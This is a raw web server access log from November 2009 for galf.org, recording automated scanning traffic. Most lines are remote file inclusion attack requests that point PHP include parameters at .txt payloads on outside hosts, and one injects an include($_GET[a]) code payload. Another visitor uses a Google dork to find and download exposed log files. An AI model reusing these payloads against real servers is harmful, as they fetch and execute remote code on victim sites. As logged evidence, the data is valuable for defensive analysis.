190.97.219.4 - - [23/Nov/2009:02:44:02 -0800] "GET /logs/access.log//bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:44:05 -0800] "GET /bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:44:05 -0800] "GET /logs//bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:44:08 -0800] "GET /logs//bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:44:10 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:44:56 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:05 -0800] "GET /logs/access_090615.log///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [23/Nov/2009:02:45:06 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:07 -0800] "GET /logs/access_090907.log///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:07 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:07 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:09 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:09 -0800] "GET /logs/access_090622.log///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:09 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:09 -0800] "GET /logs/access_090831.log///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:10 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:10 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:02:45:20 -0800] "GET /bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:45:22 -0800] "GET /logs//bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:45:22 -0800] "GET /logs/access.log//bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:30 -0800] "GET /logs/access_090831.log///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:30 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:45:30 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:45:37 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:45:54 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:45:54 -0800] "GET /logs////modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:45:54 -0800] "GET /logs/access_090504.log%20%20////modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:45:57 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:45:57 -0800] "GET /logs/access_090504.log%20%20////modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:45:57 -0800] "GET /logs////modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:45:58 -0800] "GET /logs/access_091102.log%20%20////modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [23/Nov/2009:02:46:01 -0800] "GET /logs/access_091102.log%20%20////modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:46:13 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:46:13 -0800] "GET /logs/access_090622.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:02:46:13 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:02:46:45 -0800] "GET /logs/access_090309.log%20%20//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:47:39 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:47:40 -0800] "GET /logs/access_090622.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:47:40 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:47:42 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:47:47 -0800] "GET /logs/access_090309.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:47:55 -0800] "GET /logs/access_090525.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:48:01 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:48:01 -0800] "GET /include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:48:01 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:48:28 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:48:28 -0800] "GET /include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:48:28 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:48:47 -0800] "GET /logs/access_090608.log//include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:49:11 -0800] "GET /logs/access_090921.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:49:11 -0800] "GET /include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.83.209.55 - - [23/Nov/2009:02:49:11 -0800] "GET /logs//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.83.209.55 - - [23/Nov/2009:02:49:12 -0800] "GET /logs/access.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.208.87.170 - - [23/Nov/2009:02:49:48 -0800] "GET /logs/access_090511.log HTTP/1.1" 200 5177344 "http://www.google.com.br/search?hl=en&safe=off&client=firefox-a&rlz=1R1GGGL_en___RU351&num=50&q=gmail+passwd++filetype%3Alog&btnG=Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:49:48 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:49:52 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:49:53 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:49:54 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:50:00 -0800] "GET /logs/access_090622.log///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:02:50:00 -0800] "GET /logs/access_090608.log//include/bbs.lib.inc.php?site_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:50:04 -0800] "GET /logs/scripts.log HTTP/1.1" 200 1777876 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:50:27 -0800] "GET /logs/access_091123.log HTTP/1.1" 200 2097152 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:50:30 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:50:36 -0800] "GET /logs/access.log HTTP/1.1" 200 362556 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
209.216.203.109 - - [23/Nov/2009:02:50:37 -0800] "GET /logs/access_090713.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:51:12 -0800] "GET /logs/access_090525.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:51:24 -0800] "GET /logs/access.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.208.87.170 - - [23/Nov/2009:02:52:28 -0800] "GET /logs/access_090518.log HTTP/1.1" 200 8460331 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:52:50 -0800] "GET /logs/access.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:56:54 -0800] "GET /logs/access_090921.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:56:54 -0800] "GET /include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.83.209.55 - - [23/Nov/2009:02:56:55 -0800] "GET /logs//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.83.209.55 - - [23/Nov/2009:02:56:58 -0800] "GET /logs/access.log//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.86.9.234 - - [23/Nov/2009:02:57:17 -0800] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://indras.fileave.com/test.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
70.86.9.234 - - [23/Nov/2009:02:57:20 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://indras.fileave.com/test.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:02:59:44 -0800] "GET /logs/access_090309.log//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:02:26 -0800] "GET /logs/access_090921.log//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:02:26 -0800] "GET /logs//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:02:26 -0800] "GET /logs/access.log//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:02:26 -0800] "GET /include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.107.130 - - [23/Nov/2009:03:06:05 -0800] "GET /ashnews.php?pathtoashnews=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:03:06:14 -0800] "GET /logs//ashnews.php?pathtoashnews=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:03:06:14 -0800] "GET /logs/access_090518.log%20%20//ashnews.php?pathtoashnews=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:03:06:54 -0800] "GET /logs/access_090622.log%20%20//ashnews.php?pathtoashnews=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.81.130.215 - - [23/Nov/2009:03:08:15 -0800] "GET /logs/access_091102.log/////appserv/main.php?appserv_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.81.130.215 - - [23/Nov/2009:03:08:15 -0800] "GET ////appserv/main.php?appserv_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.81.130.215 - - [23/Nov/2009:03:08:15 -0800] "GET /logs/////appserv/main.php?appserv_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:45 -0800] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:45 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:45 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:47 -0800] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:47 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:47 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.0" 200 4932 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:50 -0800] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:50 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:50 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:58 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:58 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:10:58 -0800] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:12:07 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:12:07 -0800] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:12:08 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://church.co.kr/bbs/include/fx29id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:07 -0800] "GET /skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:07 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:08 -0800] "GET /skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:08 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:09 -0800] "GET /skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:13:09 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:03:14:19 -0800] "GET /logs/access_091102.log%20%20//modify.php?dir_module=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:03:14:19 -0800] "GET /modify.php?dir_module=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:03:14:19 -0800] "GET /logs//modify.php?dir_module=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:03:14:19 -0800] "GET /logs/access_090504.log%20%20//modify.php?dir_module=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:16:19 -0800] "GET /logs/access_090601.log%20%20//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:16:20 -0800] "GET /logs/access_090601.log%20%20//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
